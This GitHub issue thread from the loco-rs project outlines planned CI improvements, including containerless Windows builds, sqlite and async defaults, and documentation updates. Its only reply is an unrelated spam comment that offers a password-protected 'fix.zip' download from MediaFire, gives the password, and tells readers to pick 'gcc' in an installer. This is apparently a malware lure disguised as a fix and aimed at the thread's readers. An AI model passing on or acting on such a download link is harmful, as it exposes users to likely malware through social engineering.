### ISSUE TITLE
CI improvements

### ISSUE THREAD

**Issue by jondot** [loco-rs/loco#720]
once https://github.com/loco-rs/loco/pull/716 is done, we can do "unattended" various-options generation of starter apps, including different database options and background worker options, all through CLI flags.

This is the outline of improvements we can have after it is done:

* [ ] implement a windows ci end to end without containers, generating app and migration by selecting: async, sqlite (by this, creating a 0 dependencies, no containers set up) https://github.com/loco-rs/loco/pull/715
* [ ] set all defaults to not require any containers. 
* [ ] add CI for "containerless" and "with containers" which is: `pg + redis` vs `sqlite + async`
* [ ] we can now troubleshoot https://github.com/loco-rs/loco/issues/714
* [ ] modify documentation: the default app for development is now async and sqlite. how do we move to a real set up with postgres and redis as queue
* [ ] THINK: can we remove some starters now that we have building with options?

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
